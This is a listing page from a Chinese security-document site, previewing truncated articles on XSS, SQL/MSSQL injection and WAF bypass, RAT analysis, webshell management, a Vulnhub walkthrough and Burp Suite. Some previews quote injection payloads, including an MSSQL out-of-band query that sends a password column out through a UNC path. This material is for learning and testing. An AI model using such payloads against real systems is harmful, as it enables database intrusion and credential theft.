爱豆文档 - 信息安全文档下载平台 - idocdown.com （部分文档，免费下载）

. . . . . .

XSS 实战攻击思路总结

# XSS实战攻击思路总结 ## 前言本文总结了XSS(跨站脚本攻击)的多种实战攻击思路，通过实际案例演示如何利用XSS漏洞进行攻击。这些技术仅供网络安全学习和研究使用，禁止用于非法用途。 ## 钓鱼网站鉴别方法 ### 域名分析 1. 检查一级域名是否合法 - 示例：qq.xps.com中"qq"是二级域名，一级域名xps.com暴露了钓鱼本质 2. 注意拉丁字母伪造域名 - 示例： - 真域名：www.oppo.com - 假域名：www.οppο.

2025-08-18 09:23:18

浅谈js在挖掘CNVD通用漏洞中的思路，附实战案例

# JavaScript在挖掘CNVD通用漏洞中的思路与实战 ## 一、前言本文详细介绍了如何通过分析JavaScript文件来挖掘CNVD通用漏洞的思路和方法，并附有实战案例。JavaScript文件在现代Web应用中承载了大量业务逻辑和敏感信息，是漏洞挖掘的重要切入点。 ## 二、关键JavaScript文件定位 ### 1. 常见重要文件路径 - 配置文件： - `/config/index.js` - `/config/menu.js` - 包含特定关键词的文件

2025-08-18 09:22:18

MySQL绕过小结

# MySQL注入绕过技术详解 ## 0x01 前言本文总结了MySQL注入中各种绕过WAF(Web应用防火墙)的技术手段，围绕SQL语句中的五个关键位置进行详细分析，并提供实际示例和FUZZ方法。 ## 0x02 SQL注入关键位置分析在SQL注入中，可以将每个SQL关键字两侧可插入的点称为"位"，主要分为五个关键位置： ### 位置一：关键字前 1. **注释符** ```sql /**/union select 1,user,3 from admin /*

2025-08-18 09:21:40

高级的MSSQL注入技巧

# 高级MSSQL注入技巧详解 ## 1. DNS带外(OOB)数据泄露技术当遇到禁用堆栈查询的完全盲SQL注入时，可以通过以下函数实现DNS带外数据泄露： ### 1.1 使用`fn_xe_file_target_read_file()` ```sql https://vuln.app/getItem?id=1+and+exists(select+*+from+fn_xe_file_target_read_file('C:\*.xel','\\'%2b(select+pass+fro

2025-08-18 09:20:35

抱歉，无法读取该文件。请更新其他文件，我可以为你进行总结。

2025-08-18 09:19:42

【干货】一文掌握JavaScript检查对象空值的N种技巧！

# JavaScript检查对象空值的全面指南 ## 为什么需要检查对象空值在JavaScript开发中，检查对象是否为空是一项常见且重要的任务，主要原因包括： 1. **防止空引用错误**：避免尝试访问空对象属性时抛出`TypeError` 2. **数据验证**：表单提交前验证用户输入是否完整 3. **条件逻辑控制**：根据对象是否为空执行不同分支逻辑 4. **数据处理优化**：空对象时可跳过不必要的数据处理 5. **UI交互控制**：根据对象状态显示/隐藏界面元素 ## 原

2025-08-18 09:19:25

SpringWeb中获取路径前缀的方式与潜在的权限绕过风险

# Spring Web 中路径前缀获取方式与权限绕过风险分析 ## 1. 背景与问题概述在 Spring Web 应用中，路径前缀（Context Path）是 Web 应用部署时的基础路径，通常用于区分同一服务器上部署的不同应用。在权限控制场景中，路径前缀的正确处理至关重要，因为： 1. 权限系统通常基于完整路径进行访问控制 2. 路径前缀处理不当可能导致权限绕过风险 3. 不同环境下（开发/测试/生产）路径前缀可能不同 ## 2. Spring Web 中获取路径前缀的方式 #

2025-08-18 09:18:13

Vermin RAThole深度分析

# Vermin RAThole恶意软件家族深度分析教学文档 ## 1. 概述 Vermin RAThole是一组针对乌克兰政府机构的恶意软件家族，包括Quasar RAT、Sobaken和Vermin。这些恶意软件主要用于窃取数据和远程控制受害者系统。 ## 2. 攻击活动时间线 - **最早活动**：可追溯到2015年10月，实际可能更早 - **主要活跃期**：2017年中持续到2018年 - **不同家族使用时间**： - Quasar RAT：2015年10月-2016年4

2025-08-18 09:17:16

ALL-IN-ONE 拼图补全计划之：Webshell 管理

# Yaklang Webshell 管理功能详解 ## 一、功能概述 Yaklang v1.3.0 版本引入了试验性的网站管理功能，主要用于管理冰蝎(Behinder)、哥斯拉(Godzilla)等类型的Webshell。该功能提供了： - 存活探测 - 获取基础信息 - 命令执行 - 部分文件管理功能 **重要提示**：使用前必须获取合法授权，仅用于管理自己拥有的网站。 ## 二、支持的Webshell类型 ### 1. 哥斯拉(Godzilla)管理 **连接步骤**： 1.

2025-08-18 09:06:10

Vulnhub练习DC-5 完整复现

# DC-5 靶机渗透测试完整复现教程 ## 一、环境准备 ### 靶机信息 - 靶机名称: DC-5 (来自Vulnhub) - 可能的IP地址: 192.168.200.11 或 192.168.200.58 - 开放服务: HTTP (80端口), RPC (111端口), 其他(43853端口) ### 攻击机信息 - 系统: Kali Linux - IP地址: 192.168.200.14 ## 二、信息收集阶段 ### 1. 主机发现使用三种方法扫描网段内存活主机:

2025-08-18 09:05:30

最新Burp Suite入门技术

# Burp Suite 入门技术详解 ## 一、Burp Suite 简介 Burp Suite 是一款集成化的渗透测试工具，主要用于 Web 应用程序的渗透测试和安全检测。它具有以下特点： - 由 Java 语言编写，具有跨平台性 - 包含多种功能模块，可高效完成渗透测试 - 需要手动配置参数并触发自动化流程 - 提供免费版和专业版（专业版包含更多高级功能） ## 二、安装准备 ### 1. Java 环境安装 Burp Suite 依赖 JRE 运行，需先安装 Java 环境：

2025-08-18 09:04:30

米桃安全漏洞讲堂系列第1期：SQL注入漏洞

# SQL注入漏洞全面解析与防御指南 ## 一、SQL注入概述 ### 1.1 漏洞原理 SQL注入(Structured Query Language Injection)是一种攻击者通过构造特殊输入，欺骗服务器执行恶意SQL命令的攻击技术。其本质是对用户输入检查不充分，导致SQL语句将用户提交的非法数据当作语言的一部分来执行。 **漏洞示例代码**： ```python uname = request.POST['username'] password = request.POST[

2025-08-18 09:03:48

跳转到页